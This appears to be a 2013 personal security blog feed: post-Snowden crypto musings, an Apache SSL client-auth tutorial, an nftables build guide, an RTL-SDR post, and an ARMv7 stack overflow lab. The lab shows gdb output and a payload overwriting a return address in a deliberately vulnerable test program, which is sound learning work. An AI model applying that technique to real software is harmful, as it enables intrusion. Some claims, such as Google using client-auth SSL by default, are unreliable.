May the L0rd's hacking spirit guide us!!!Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com1tag:blogger.com,1999:blog-35345954.post-89785618237084071522013-12-25T00:49:00.002+08:002013-12-25T00:49:23.924+08:00Life was never easy...especially in post-prism era;-)I've watched a great free speech today:<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/zdUx4hqxKRw?feature=player_embedded' frameborder='0'></iframe></div>
<br />
Bruce Schneier, our great philosopher in cybersec field. And Eben Moglen, afaik, he is a great hacker( not in computer stuff) in <span style="color: lime;">free software</span> law field. I do remember I used to listen Eben's free speech( electronic version) when I was in college. Seven years until now, I know better about why there are group of people has been trying fight for digital rights, software freedom, etc.....<br />
<br />
I'm here to share something I've learn from Bruce and Eben today. This writeup is going to be my notes and some personal summary of 2013. It may be mess a little bit;-)<br /><br />What do we learn from Mr Snowden's disclosure about crypto?<br />
------------------------------------------------------------------<br />Cryptography itself is still hard to break. <span style="color: red;">NSA</span> is not breaking the math, but breaking by cheating, by stealing private keys, by forging certificates, by doing non-crypto stuff to archive their *ditry* goals. Even in the fucked-up case of Google, NSA didn't crack the traffic between user's browser and Google's server. Because Google uses client auth SSL at default, more importantly, it works( NSA dont like it). But NSA hijacked the traffic between Google data centers where the SSL/TLS was removed for whatever reasons( cost?). Crypto is still the one of the best ways to fight NSA or NSA-like organization.<br /><br /><br />Tor stories?<br />
------------------------------------------------------------------<br />Personally, I like Tor. It probably could save people's life in some "restricted" area. Tor is pissed off agencies like NSA. The contributors of Tor project have routine seminars. It seems that the discussion of how to break Tor is their daily bread;-) Thanks to Tor project contributors.<br /><br />What if NSA is in our threat model?<br />
------------------------------------------------------------------<br />The 1st thing is mitigation: NSA got a piece of math but still need a bunch of engineers to make it work. Let NSA pay for higher cost( timing budget not new math). Plz use particular crypto technology( on GNU/Linux distro) as much as possible. It's reasonable to speculating that NSA has something about crypto stuff but we don't. Information asymmetry is indeed exsit. Of course NSA known what we do in past decades but we are rarely to known what NSA has been doing in the same period..so thanks to Mr Snowden's disclosure gave us *a little more* information. <br /><br />And NSA-like organizations are definitely needs a lot of automated attack tools: foxasset? The reason it simple: you can't just train people on the street to become old school hackers in few months. That's why they have to develop automated tools.<br /><br />btw: What does old school hacker mean in my context? A type of people who are highly skilled with low-level techniques, such as *NIX System, networking( both internet stuff and corenet of telco), reversing, cryptography, C/ASM code audit, etc..and also have a specific type of strong philosophy with underground spirit;-)....ug spirit~wth<br /><br />Standard corruption?<br />
------------------------------------------------------------------<br />It's not all standards does security matters. Bruce thinks AES is still secure. We can't only blame the Dual ECC stuff to standard process's fault. Implementation is important, such as non-NSA involved internation cellphone standard was fucked up..A1/5? Ring the bell? We should only trust these public standards, which our guys( free software enthusiast, cybersec philosophical anarchist like Phrack guys? or people like Bruce?:)) are getting involve with it.<br /><br />What tools can we trust?<br />
------------------------------------------------------------------<br />GNUPG, tor, OTR, etc... Some of these open source tools are written by security/crypto paranoids. They have a very awesome design and implementation.<br /><br />What if you are on the target list of NSA-like organization?<br />
------------------------------------------------------------------<br />If you are targeted, there's nothing you can do in that level. Is this a super-APT shit?<br /><br />Is cyberwar going to be end?<br />
------------------------------------------------------------------<br />I don't think so. If everyone holds the philosophy of "I'll fuck you if you don't fuck me first, sir", then it would turn the whole scene to be everybody being fucked by everybody. That's what old school hackers has been through the paradigm shift( painfully?) from old good hacking days to "This is cyber, sir!".<br /><br />Is that sounds we are hopeless?<br />
------------------------------------------------------------------<br />Nope, quoted from Bruce:"Society improves because people dare to think the unthinkable and then after 20, 30 years everyone says that was kind of good idea. It takes a while but it has to start."<br />
<br />
<br />
FOSS solutions?<br />
------------------------------------------------------------------ <br />
Bruce thinks open source solution is more secure than closed ones. Because:<br />1, You can look at it( source code)<br />2, It's harder to let someone slip into<br /><br />We probably don't need to worry too much( did I say "too much"?) about NSA was/is/will try to put backdoor in some fundamental free software projects, like linux kernel, GCC, Glibc, "supposed to be re-written" openssl;-) etc. Because according to the full-disclosured documentations, NSA seems amazingly risks aversed. They only want to take a safe path. Yeah..yeah, I know what they're thinking...you can do evil, but don't be caught up;-) Free/open source community have a lot of old school hackers has been do code review for decades. They did a great job. And they are going to continue this *secret* war aginst NSA-like organization. So it's not easy attack( backdooring) on compiler.....( and, there are tons of guys like me are trying to be old school hackers).<br /><br />Leap of faith?<br />
------------------------------------------------------------------<br />Yeah, it sounds perfect. But no one can ensure you 100% secure. But the fact is that you can't examine everything. You must trust them( the tools you use). Give yourself a little faith. Did Soren A. Kierkegarrd said that we could feel comfortable to use GCC;-)<br /><br />Well, use Apple products( iphone, ipad, ishit) and Microsoft products( Win for gaming platform, Office for whatever) are not a good options. Drop them, come on!<br /><br />
Hardware box issues: never update the full-disclosured vulns:<br />
------------------------------------------------------------------<br />In some countries, cybersec business couldn't support small business. The reason cause that happened, because the most of customers had/have the wrong concept about cybersec. They think the only thing you need to do is<br />buy a bunch of hardware boxes( firewall, IDS/IPS, UTM, NGFW, or whatever). Obviously, it's violating the very important old school principles:<br />------------------------------------------------------------------<br />Security is NOT:<br /><br />Security is NOT installing a firewall ..<br />Security is NOT a Product or Service .. ( by Schneier, Bruce )<br />Security is Not a Product; It's a Process .. ( by Schneier, Bruce )<br />A Security Audit is NOT "running a port scan and turning things off" ..<br /><br /><br />Security is:<br /><br />Security is "Can you still continue to work productively/safely, without compounding the security breach"<br />Security is only as good as your "weakest link"<br />Security is "risk management" of your corporate resources(computers/people), required expertise, time management, implementation costs, data backup/recovery proceedures ...<br />Security is a Process, Methodology, Costs, Policies and People<br />Security is "Can somebody physically walk out with your computers,<br />disks, tapes, .. "<br />Security is 24x7x365 ... constantly ongoing .. never ending<br />Security is "learn all you can as fast as you can, without negatively<br />affecting the network, productivity and budget"<br />------------------------------------------------------------------<br /><br />In past few years, more and more enterprise management guys are realizing that those hardware boxes can't solve the problem, which it was supposed to be solved.* Right here, there's one thing you might want to know: Firstly, some "sec box" vendor has been using a lot of open source code( linux kernel, snort, l7, BRO, etc) but they never contribute to the community. *........Personally I do believe that only old school cybersec principles can make system secure. But it need skilled people to do a lot of work in the daily cybersec process. Well, the mainstream marketing are still advertising the *boxes* solution is one thing, while it's hard to find old school guys is another.<br />
<br />What I'm trying to say are not hardware boxes are not important. But people also can do small business with trying to find cheap and effective solution. That's where open source cybersec solution fit in. There are a lot of great cybersec open source project. All you have to do is to pay someone who know<br />these cybersec open source code and combine them into the your own cybersec solution. For example, a customer want to hardening their network and server. There are a lot of open source sec project can do that, such as<br />iptables/snort/psad/tcpwrapper/apparmor/openssl/apache or web level<br />hardening stuff( inside the DJANGO for preventing sql injection, mod_security, etc). But the customer would pay someone who know about it to consulting for<br />them. The skilled guy could train customer's IT guys or go through<br />with their own implementation. Personally, I think it's the best to do<br />the cybersec small business. It's win-win solution! Old school guys get<br />pay and customer are happy.<br />
<br />
btw: Some regions may have these cybersec small business model already.<br />--------------------------------------------------------------------------<br />
<br />
Well, it's Christmas today. As a Neo-Calvinist, I wouldn't talk about religion too much in my daily life. But all in all, neo-calvinist is Christian indeed. I'm not too religious. Sometimes, I really hate those nominal christian was feel so good to doing terrible things in name of god....fuc* them....Anyway, hacker is a type of people who are willing to seek the truth with no matter cost. Even I'd see L0rd Jesus look like overmind( from starcraft) after I die. The problem to me would be "Is this true my L0rd looks like overmind?", if he is the L0rd whatever he looks like, I'd be still worship him;-)<br />
<br />
Hacker can pick the <span style="color: red;">red</span> pill.<br />
Hacker can destroy the <span style="color: blue;">blue</span> pill.<br />
Hacker can embrace the <span style="color: #ffd966;">desert</span> of the real.<br />
<br />
Merry Christmas, my fellow brothers/sisters!<br />
<br />
<span style="color: lime;">May L0rd's hacking spirit guide us in 2014!!! </span>Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com0tag:blogger.com,1999:blog-35345954.post-90304639295522600852013-11-27T19:25:00.000+08:002013-11-27T20:15:14.644+08:00How to set up apache2 with SSL/TLS support and client auth on Debian 7.2I think SSL/TLS should be part of security hardening process. Only fools would not use cryptography technology in post-prism era. I think what Mr Snowden did, that was proved one thing: Richard Stallman and Phrack guys( I prefer use the term "<span style="color: lime;">philosophical anarchist</span>") never lie to us;-) Well, I don't wanna bullshit anything about this controversial topic here...let's see how we can set up a HTTPS server with client auth.<br />
<br />
<span style="color: lime;">Generate CA certificates</span>:<br />
--------------------------------------------------------------------------------<br />
root@d6-test:/opt/ssl# <b>cp /usr/lib/ssl/misc/CA.sh .</b><br />
root@d6-test:/opt/ssl# <b>./CA.sh -newca</b><br />
CA certificate filename (or enter to create)<br />
<br />
Making CA certificate ...<br />
Generating a 2048 bit RSA private key<br />
..................................+++<br />
..............................................+++<br />
writing new private key to './demoCA/private/./cakey.pem'<br />
.............................................<br />
.............................................<br />
Country Name (2 letter code) [AU]:CN<br />
State or Province Name (full name) [Some-State]:Shanghai<br />
Locality Name (eg, city) []:Shanghai<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT<br />
Organizational Unit Name (eg, section) []:MOT<br />
Common Name (e.g. server FQDN or YOUR name) []:<span style="color: red;">hardened-shit</span><br />
Email Address []:info@hardened-shit.com<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
Using configuration from /usr/lib/ssl/openssl.cnf<br />
Enter pass phrase for ./demoCA/private/./cakey.pem:<br />
Check that the request matches the signature<br />
Signature ok<br />
Certificate Details:<br />
Serial Number:<br />
c0:81:0e:bc:52:d0:19:5a<br />
Validity<br />
Not Before: Nov 19 02:08:14 2013 GMT<br />
Not After : Nov 18 02:08:14 2016 GMT<br />
Subject:<br />
countryName = CN<br />
stateOrProvinceName = Shanghai<br />
organizationName = MOT<br />
organizationalUnitName = MOT<br />
commonName = hardened-shit<br />
emailAddress = info@hardened-shit.com<br />
X509v3 extensions:<br />
X509v3 Subject Key Identifier: <br />
D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63<br />
X509v3 Authority Key Identifier: <br />
keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63<br />
<br />
X509v3 Basic Constraints: <br />
CA:TRUE<br />
Certificate is to be certified until Nov 18 02:08:14 2016 GMT (1095 days)<br />
<br />
Write out database with 1 new entries<br />
Data Base Updated<br />
--------------------------------------------------------------------------------<br />
<br />
<span style="color: lime;">Copy intermediate key and certificate</span>:<br />
--------------------------------------------------------------------------------<br />
root@d6-test:/opt/ssl#<b> cp demoCA/private/cakey.pem ca.key</b><br />
root@d6-test:/opt/ssl# <br />
root@d6-test:/opt/ssl# <b>cp demoCA/cacert.pem ca.crt</b><br />
--------------------------------------------------------------------------------<br />
<br />
<span style="color: lime;">Generate server key</span>:<br />
--------------------------------------------------------------------------------<br />
root@d6-test:/opt/ssl# <b>openssl genrsa -des3 -out server.key 2048</b><br />
Generating RSA private key, 2048 bit long modulus<br />
...+++<br />
.................+++<br />
e is 65537 (0x10001)<br />
Enter pass phrase for server.key:<br />
Verifying - Enter pass phrase for server.key:<br />
--------------------------------------------------------------------------------<br />
<br />
<span style="color: lime;">Generate server CSR(Certificate Signing Request) with server key</span>:<br />
--------------------------------------------------------------------------------<br />
root@d6-test:/opt/ssl# <b>openssl req -new -key server.key -out server.csr</b><br />
...........................................<br />
........................................<br />
-----<br />
Country Name (2 letter code) [AU]:CN<br />
State or Province Name (full name) [Some-State]:Shanghai<br />
Locality Name (eg, city) []:Shanghai<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT<br />
Organizational Unit Name (eg, section) []:MOT<br />
Common Name (e.g. server FQDN or YOUR name) []:<span style="color: red;">hardened-shit</span><br />
Email Address []:info@hardened-shit.com<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
--------------------------------------------------------------------------------<br />
<br />
<span style="color: lime;">Genrate server certificate</span>:<br />
--------------------------------------------------------------------------------<br />
root@d6-test:/opt/ssl# <b>openssl req -x509 -days 2048 -key server.key -in server.csr > server.crt</b><br />
Enter pass phrase for server.key<br />
--------------------------------------------------------------------------------<br />
<br />
<span style="color: lime;">You can check out the cert or verify it:</span><br />
<b>openssl x509 -noout -text -in server.crt<br />openssl verify -CAfile ca.crt server.crt </b><br />
<br />
<span style="color: lime;">Generate client's key</span>:<br />
--------------------------------------------------------------------------------<br />
root@d6-test:/opt/ssl# <b>openssl genrsa -des3 -out client.key 2048</b><br />
Generating RSA private key, 2048 bit long modulus<br />
..........................................................................................................................................+++<br />
........+++<br />
e is 65537 (0x10001)<br />
Enter pass phrase for client.key:<br />
Verifying - Enter pass phrase for client.key:<br />
--------------------------------------------------------------------------------<br />
<br />
<span style="color: lime;">Client's CSR:</span><br />
--------------------------------------------------------------------------------<br />
root@d6-test:/opt/ssl# <b>openssl req -new -key client.key -out client.csr</b><br />
.......................................................<br />
..............................................<br />
-----<br />
Country Name (2 letter code) [AU]:CN<br />
State or Province Name (full name) [Some-State]:Shanghai<br />
Locality Name (eg, city) []:Shanghai<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT<br />
Organizational Unit Name (eg, section) []:MOT<br />
Common Name (e.g. server FQDN or YOUR name) []:<span style="color: red;">hardened-shit</span><br />
Email Address []:info@hardened-info.com<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
<br />
Generate client's certificate with CA certificate's signature:<br />
root@d6-test:/opt/ssl# openssl ca -in client.csr -out client.crt<br />
Using configuration from /usr/lib/ssl/openssl.cnf<br />
Enter pass phrase for ./demoCA/private/cakey.pem:<br />
Check that the request matches the signature<br />
Signature ok<br />
Certificate Details:<br />
Serial Number:<br />
c0:81:0e:bc:52:d0:19:5c<br />
Validity<br />
Not Before: Nov 19 02:28:13 2013 GMT<br />
Not After : Nov 19 02:28:13 2014 GMT<br />
Subject:<br />
countryName = CN<br />
stateOrProvinceName = Shanghai<br />
organizationName = MOT<br />
organizationalUnitName = MOT<br />
commonName = hardened-shit<br />
emailAddress = info@hardened-info.com<br />
X509v3 extensions:<br />
X509v3 Basic Constraints: <br />
CA:FALSE<br />
Netscape Comment: <br />
OpenSSL Generated Certificate<br />
X509v3 Subject Key Identifier: <br />
A6:A5:D7:7C:C7:A8:C3:24:C7:90:14:76:84:15:43:D0:2C:0C:31:66<br />
X509v3 Authority Key Identifier: <br />
keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63<br />
<br />
Certificate is to be certified until Nov 19 02:28:13 2014 GMT (365 days)<br />
Sign the certificate? [y/n]:y<br />
<br />
<br />
1 out of 1 certificate requests certified, commit? [y/n]y<br />
Write out database with 1 new entries<br />
Data Base Updated<br />
--------------------------------------------------------------------------------<br />
<br />
<br />
<span style="color: lime;">Convert to pkcs12 format, which can be identified by firefox</span>:<br />
--------------------------------------------------------------------------------<br />
root@d6-test:/opt/ssl# <b>openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.pfx</b><br />
Enter pass phrase for client.key:<br />
Enter Export Password:<br />
Verifying - Enter Export Password:<br />
--------------------------------------------------------------------------------<br />
<br />
<span style="color: lime;">Enable SSL/TLS support in Apache2</span>:<br />
--------------------------------------------------------------------------------<br />
root@hardened-shit:/opt#<b> mv ssl /etc/ssl/hardened-shit</b><br />
<br />
root@hardened-shit:/etc/apache2# <b>a2ensite default-ssl</b><br />
Enabling site default-ssl.<br />
To activate the new configuration, you need to run:<br />
service apache2 reload<br />
root@hardened-shit:/etc/apache2#<b> a2enmod ssl</b><br />
Module ssl already enabled<br />
<br />
edit /etc/apache2/sites-enabled/default-ssl:<br />
<b> SSLCertificateFile /etc/ssl/hardened-shit/server.crt<br /> SSLCertificateKeyFile /etc/ssl/hardened-shit/server.key<br /><br /> SSLCertificateChainFile /etc/ssl/hardened-shit/ca.crt<br /><br /> SSLCACertificatePath /etc/ssl/hardened-shit/<br /> SSLCACertificateFile /etc/ssl/hardened-shit/ca.crt<br /><br /> SSLVerifyClient require<br /> SSLVerifyDepth 10</b><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Disable port 80: <br />
root@hardened-shit:/etc/apache2# <b>a2dissite default</b><br />
--------------------------------------------------------------------------------<br />
<br />
Done....it should works.<br />
<br />
btw: I highly recommend you to read these two articles if you want to know further: <a href="https://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/" target="_blank">Hardening Your Web Server's SSL Ciphers</a>, and <a href="http://ggramaize.wordpress.com/2013/08/02/tls-perfect-forward-secrecy-support-with-apache/" target="_blank">TLS Perfect Forward Secrecy support with Apache</a><br />
<br />
I only enable the secure ciphers:<br />
<b>SSLCipherSuite HIGH:MEDIUM:!aNULL:!MD5<br />SSLProtocol +TLSv1.2 +TLSv1.1</b>Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com4tag:blogger.com,1999:blog-35345954.post-84452290468209000012013-11-21T01:25:00.000+08:002013-11-21T01:25:01.477+08:00Hello, stack bufferoverflow on Debian ARMv7I haven't make my hands *dirty* for a long time since I stopped on io-wargame lvl11. As we all know that ARM architectures are becoming sec guys's daily bread. I think it's time to begin my journey to explore what's the diff between ARMv7 and x86/x64 out there. It would be good to build a testing environment in the pre-adventure stage. Debian has been supporting ARMv7 for a while. You can follow this <a href="https://gist.github.com/bdsatish/7476239" target="_blank">great article</a> to install a Debian GNU/Linux for ARMv7( armhf) distro. After the installation, you probably want to config a <a href="https://felipec.wordpress.com/2009/12/27/setting-up-qemu-with-a-nat/" target="_blank">NAT network between host and qemu guest</a>. Or just use my <a href="https://github.com/citypw/arsenal-4-sec-testing/tree/master/others/qemu_nat" target="_blank">network config</a>.<br />
<br />
To figure out the memory layout is a good starting point. Take a glance at <a href="https://github.com/citypw/citypw-SCFE/blob/master/security/ARM/overwrite_ret_addr_armv7/victim.c" target="_blank">the code</a> at 1st, plz.....<br />
<br />
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ gdb ./victim -q<br />Reading symbols from /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim...done.<br />(gdb) disassemble main<br />Dump of assembler code for function main:<br /> 0x00008448 <+0>: push {r7, lr}<br /> 0x0000844a <+2>: sub sp, #8<br /> 0x0000844c <+4>: add r7, sp, #0<br /> 0x0000844e <+6>: str r0, [r7, #4]<br /> 0x00008450 <+8>: str r1, [r7, #0]<br /> 0x00008452 <+10>: movw r3, #34040 ; 0x84f8<br /> 0x00008456 <+14>: movt r3, #0<br /> 0x0000845a <+18>: mov r0, r3<br /> 0x0000845c <+20>: movw r1, #33797 ; 0x8405<br /> 0x00008460 <+24>: movt r1, #0<br /> 0x00008464 <+28>: movw r2, #33845 ; 0x8435<br /> 0x00008468 <+32>: movt r2, #0<br /> 0x0000846c <+36>: blx 0x8340 <printf><br /> 0x00008470 <+40>: ldr r3, [r7, #0]<br /> 0x00008472 <+42>: add.w r3, r3, #4<br /> 0x00008476 <+46>: ldr r3, [r3, #0]<br /> 0x00008478 <+48>: mov r0, r3<br /> 0x0000847a <+50>: bl 0x8404 <test><br /> <span style="color: red;">0x0000847e</span> <+54>: mov.w r3, #0 ==> <span style="color: lime;">0x0000847e should be the return address of test()</span><br /> 0x00008482 <+58>: mov r0, r3<br /> 0x00008484 <+60>: add.w r7, r7, #8<br /> 0x00008488 <+64>: mov sp, r7<br /> 0x0000848a <+66>: pop {r7, pc}<br />End of assembler dump.<br />(gdb) disassemble fuck_me <br />Dump of assembler code for function fuck_me:<br /> <span style="color: red;">0x00008434</span> <+0>: push {r7, lr} ===> <span style="color: lime;">Use 0x00008434 to overwrite test()'s ret addr</span><br /> 0x00008436 <+2>: add r7, sp, #0<br /> 0x00008438 <+4>: movw r0, #34024 ; 0x84e8<br /> 0x0000843c <+8>: movt r0, #0<br /> 0x00008440 <+12>: blx 0x8358 <puts><br /> 0x00008444 <+16>: pop {r7, pc}<br />End of assembler dump.<br /><br /><span style="color: lime;">Let's check the memory layout:</span><br /><br />(gdb) b test<br />Breakpoint 1 at 0x840c: file victim.c, line 11.<br />(gdb) r AAAABBBB<br />Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim AAAABBBB<br />The address of func test(): 0x8405, func fuck_me(): 0x8435<br /><br />Breakpoint 1, test (input=0x7efff919 "AAAABBBB") at victim.c:11<br />11 strcpy(buf, input);<br />(gdb) n<br />12 printf("%s \n", buf);<br />(gdb) <br />AAAABBBB <br />13 }<br />(gdb) x/12x $sp<br />0x7efff658: 0x00000000 0x7efff919 0x000084f8 0x41414141<br />0x7efff668: 0x42424242 0x00008400 0x7efff678 <span style="color: red;">0x0000847f</span>==> ret addr of test()<br />0x7efff678: 0x7efff7d4 0x00000002 0x00000000 0x76f12cfb<br /><br />So the layout should be like this:<br />[high addr]...[<span style="color: lime;">buf</span>:..16-byte...][<span style="color: red;">Return addr</span>]...[low addr]<br /><br />Why the hell the addr of 0x0000847e we saw above now became 0x0000847f. Weird...Anyone know about what happened?<br /><br />OK, let's try our 1st exp:<br />(gdb) r `python -c 'print "A" * 16 + "<span style="color: lime;">\x34\x84</span>"'`<br />The program being debugged has been started already.<br />Start it from the beginning? (y or n) y<br /><br />Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x34\x84"'`<br />The address of func test(): 0x8405, func fuck_me(): <span style="color: red;"><b>0x8435</b></span><br />Breakpoint 1, test (input=0x7efff90f 'A' <repeats 16="" times="">, "4\204") at victim.c:11<br />11 strcpy(buf, input);<br />(gdb) c<br />Continuing.<br />AAAAAAAAAAAAAAAA4� <br /><br />Program received signal SIGILL, Illegal instruction.<br />fuck_me () at victim.c:17<br />17 printf("being hacked\n");<br />(gdb) n<br /><br />Program terminated with signal SIGILL, Illegal instruction.<br />The program no longer exists.<br /><br />Did you see this? +1 with the fuc_me()'s addr, plz.....<br /><br />(gdb) r `python -c 'print "A" * 16 + "<span style="color: red;">\x35\x84</span>"'`<br />The program being debugged has been started already.<br />Start it from the beginning? (y or n) y<br /><br />Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x35\x84"'`<br />The address of func test(): 0x8405, func fuck_me(): 0x8435<br /><br />Breakpoint 1, test (input=0x7efff90f 'A' <repeats 16="" times="">, "5\204") at victim.c:11<br />11 strcpy(buf, input);<br />(gdb) c<br />Continuing.<br />AAAAAAAAAAAAAAAA5� <br />being hacked<br /><br />Program received signal SIGSEGV, Segmentation fault.<br />0x00008432 in test (input=<error 0x4141415d="" access="" address="" at="" cannot="" memory="" reading="" variable:="">) at victim.c:13<br />13 }<br /><br />It worked! So, the exp should be like:<br />shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ ./victim `python -c 'print "A" * 16 + "\x35\x84"'`<br />The address of func test(): 0x8405, func fuck_me(): 0x8435<br />AAAAAAAAAAAAAAAA5� <br />being hacked<br />Segmentation fault</error></repeats></repeats></puts></test></printf><br />
===========================<br />
<br />
I guess the exploit of ARM would be much different to x86. I've heard of ret2libc won't work on ARM. That's really interesting and worth to figure it out. Obviously, this <a href="http://www.phrack.org/issues.html?issue=66&id=12&mode=txt" target="_blank">Phrack paper</a> and some manuals should be added into my must-read list.Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com0tag:blogger.com,1999:blog-35345954.post-40846962954625152202013-10-23T17:26:00.002+08:002013-10-23T17:29:08.290+08:00Say "hello nftables" on Debian 7 GNU/LinuxNftables is the <a href="http://lwn.net/Articles/324989/" target="_blank">4th generation packet filter engine for linux kernel </a>and it will be merged into kernel 3.13. I haven't play with netfilter for a while. When I saw Nftables a couple of days ago, I think there's something( iteches?) I need to scratch;-) Let's try to say "Hi" to nftables.<br />
<br />
OS: Debian 7 GNU/Linux. Grab the small version of iso <a href="http://cdimage.debian.org/debian-cd/7.2.0/i386/iso-cd/debian-7.2.0-i386-netinst.iso" target="_blank">here</a>.<br />
<br />
After the installation. Some packages are needed to be install also:<br />
#apt-get install git vim libgmp-dev libreadline-dev libtool autoconf gcc make pkg-config libjansson-dev libmxml-dev flex bison libncurses5-dev kernel-package<br />
<br />
Firstly, you need to compile two libraries: libmnl and libnftables<br />
git clone git://git.netfilter.org/libmnl<br />
cd libmnl/<br />
./autogen.sh<br />
./configure<br />
make<br />
sudo make install<br />
sudo ldconfig<br />
<br />
git://git.netfilter.org/libnftables<br />
cd libnftables/<br />
./autogen.sh<br />
./configure --with-json-parsing --with-xml-parsing<br />
make<br />
sudo make install<br />
sudo ldconfig<br />
<br />
Then, compile/install the userspace tool( nft):<br />
<br />
git clone git://git.netfilter.org/nftables<br />
cd nftables<br />
./autogen.sh<br />
ac_cv_func_malloc_0_nonnull=yes ac_cv_func_realloc_0_nonnull=yes ./configure<br />
make<br />
sudo make install<br />
sudo ldconfig<br />
<br />
Well, because linux-3.13 is not release yet. So we need to grab the source code from nftables dev tree:<br />
<br />
git clone git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nftables.git linux<br />
cp /boot/config-3.2.0-4-686-pae .config<br />
make menuconfig( select these NF_TABLES options)<br />
make -j 3 deb-pkg<br />
cd ../<br />
sudo dpkg -i *.deb<br />
<br />
Reboot your machine. Let's try some <a href="https://github.com/citypw/arsenal-4-sec-testing/blob/master/bt5_firewall/nft_fw" target="_blank">policies</a>. Thanks to the author whoever wrote this <a href="https://home.regit.org/netfilter-en/nftables-quick-howto/" target="_blank">HOWTO</a>. Nftables policy is seem easy to write. But I'm still not get used to the new style since I even don't know how to delete a table. It always saying the device is BUSY or something like that. WTH~ I checked the commits, it should be a feature though. I think the policy converter tool between iptables and nftables, that is necessary. Otherwise, it'd be barries to those old school iptables users/admin/developers.Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com3tag:blogger.com,1999:blog-35345954.post-82520279805841872162013-10-17T13:49:00.000+08:002013-10-17T13:49:05.606+08:00RTL-SDR version of "Hello World"Telco sec is always a fascinating field I want to get involve with. Why? Because those old school Phrack guys has playing both computer sec and telco sec. I missed the golden age of Phrack that was bothered me for a while. It won't stop me to dive into any field I want now. If what makes you tick is only for profit( money?), come on, you probably won't be having qualify to mention the term "<a href="http://phrack.org/issues.html?issue=64&id=4&mode=txt" target="_blank">underground spirit</a>";-)<br />
<br />
About 1 month ago, a friend( Can't list his/her name here-_-) sent me a <a href="https://www.defcon.org/images/defcon-21/dc-21-presentations/DePerry-Ritter/DEFCON-21-DePerry-Ritter-Femtocell-Updated.pdf" target="_blank">slide</a> about Femtocell hacking and asked if I may have interest in it. Of course, I have. But...well, there's always a fucking "but", isn't it?...femtocell is a little bit expensive and I was busy with other stuff at the time. Then I even forgot this shit until a great hacker( Can't list his/her name too-_-) mentioned about there are cheap devices I could buy some for learning telco stuff: RTL-SDR. Everything you need to know is already in this <a href="http://www.rtl-sdr.com/" target="_blank">website</a>. I bought tuner, antenna, freq counter, SMA-MCX converter,etc... then I was catching the shit in the air. FM at first, MODE-S transmission and GSM sniffing. What I have learned/done in past two weeks is really shocking my mind and it is definitely actived a bunch of neurons in my brain. This is an awesome field. I'm willing to keep up with it in the future. Hacking on GNU/Linux system calls and kernel are already a burden that's hard to carry on. Hope I can make it this time.............I really appreciate those who were/are contributed/contributing to Phrack. It's more than a technical ezine. It's about hacking spirit and philosophical ideas.<br />
<br />
Freq counter, it probably could be detecting IR-based controller<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggY4y440cB6krMUb9t_nLz4LbtT-zyaHF8LlPyXzF2RBljASBYJhpa-A-QifkrMNfQD_61Kgv9_mt4qECUbGd3sfi1GdVWuAgnvFX4PZafvpC0jtHkKBE0j1SCvkixOrBBA73-0A/s1600/1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggY4y440cB6krMUb9t_nLz4LbtT-zyaHF8LlPyXzF2RBljASBYJhpa-A-QifkrMNfQD_61Kgv9_mt4qECUbGd3sfi1GdVWuAgnvFX4PZafvpC0jtHkKBE0j1SCvkixOrBBA73-0A/s640/1.JPG" width="640" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
Catching the shit in the air( not the wire) </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLZ30XUA47WONhptE4yGlFslSzR_EmJ89EfSikDKDt0BgbWc7X-XRTvhIafQ-i_c9pBDnhFLLZeGHlwjVAEkUIEevk6CGwmafTJ8PWpbfHUijxlPfr6DmE0QhOhxQZzlyG-XVqmQ/s1600/2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLZ30XUA47WONhptE4yGlFslSzR_EmJ89EfSikDKDt0BgbWc7X-XRTvhIafQ-i_c9pBDnhFLLZeGHlwjVAEkUIEevk6CGwmafTJ8PWpbfHUijxlPfr6DmE0QhOhxQZzlyG-XVqmQ/s640/2.JPG" width="640" /></a></div>
Support EFF....<br />
<div class="separator" style="clear: both; text-align: center;">
